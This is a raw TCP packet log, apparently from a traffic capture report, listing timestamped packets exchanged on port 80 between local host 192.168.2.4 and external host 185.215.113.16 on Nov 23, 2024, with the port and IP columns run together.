                                                                                                                                                                                  Nov 23, 2024 14:46:42.745419025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.745462894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.746372938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.746412992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.746498108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.747452021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.747549057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.747601032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.748519897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.748639107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.748686075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.749599934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.749650002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.749689102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.750729084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.750782013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.750828981 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.751790047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.751837969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.751913071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.752835989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.752885103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.752937078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.753911018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.753973007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.754028082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.755014896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.755062103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.755192041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.756107092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.756259918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.756309986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.757350922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.757405996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.757453918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.758205891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.758275986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.758313894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.759303093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.759403944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.759453058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.760355949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.760469913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.760521889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.761451960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.761499882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.761658907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.762537956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.762603998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.762651920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.763570070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.763618946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.763669014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.764672995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.764724970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.764763117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.765713930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.765806913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.765888929 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.766876936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.766917944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.766951084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.767887115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.767997980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.768045902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.768945932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.769072056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.769121885 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.770023108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.770070076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.770108938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.771137953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.771195889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.771256924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.772195101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.772298098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.772349119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.773288965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.773336887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.773376942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.774384022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.774468899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.774525881 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.775526047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.775569916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.775713921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.776658058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.776712894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.776731014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.777587891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.777717113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.777772903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.778664112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.778712034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.778786898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.779717922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.779819965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.779874086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.780802011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.780925035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.780975103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.782087088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.782136917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.782171965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.782954931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.783057928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.783104897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.784033060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.784080982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.784181118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.785151958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.785203934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.785327911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.786329031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.786377907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.786432981 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.787241936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.787308931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.787348032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.788378954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.788444996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.788477898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.789407969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.789554119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.789608002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.790479898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.790529013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.790570974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.791608095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.791656971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.791707993 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.792619944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.792671919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.792706013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.838320971 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.905631065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.905695915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.905822992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.906207085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.906297922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.907233953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.907284021 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.907358885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.907397985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.908339977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.932735920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.932777882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.932785988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.933054924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.933171988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.933217049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.934153080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.934178114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.934216976 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.935221910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.935264111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.935332060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.936300039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.936419964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.936465979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.937364101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.937478065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.937524080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.938460112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.938574076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.938616037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.939506054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.939547062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.939601898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.940660000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.940711021 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.940736055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.941706896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.941723108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.941745996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.942833900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.942873955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.942941904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.943831921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.943887949 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.943948030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.944925070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.944947958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.944982052 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.946305037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.946402073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.946453094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.947057962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.947103024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.947237015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.948143959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.948237896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.948282003 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.949184895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.949300051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.949353933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.950263977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.950310946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.950359106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.951420069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.951447964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.951474905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.952420950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.952478886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.952522039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.953605890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.953622103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.953671932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.954579115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.954654932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.954699039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.955776930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.955828905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.955853939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.956721067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.956773043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.956806898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.957853079 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.958040953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.958091974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.958883047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.958923101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.958945036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.959958076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.960001945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.960069895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.961060047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.961117983 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.961149931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.962110043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.962171078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.962212086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.963308096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.963349104 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.963422060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.964261055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.964302063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.964365959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.965364933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.965403080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.965456963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.966425896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.966449976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.966481924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.967634916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.967713118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.967751980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.968560934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.968606949 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.968735933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.969655037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.969748974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.969793081 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.970686913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.970813990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.970856905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.971801996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.971864939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.971899986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.972851992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.972909927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.972951889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.973937035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.973978043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.974036932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.975008965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.975053072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.975110054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.976104021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.976161957 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.976190090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.977217913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.977269888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.977330923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.978321075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.978370905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.978404999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.979367018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.979408979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.979504108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.980420113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.980465889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.980525970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.981573105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.981621027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.981681108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.982551098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.982594013 CET4974480192.168.2.4185.215.113.16
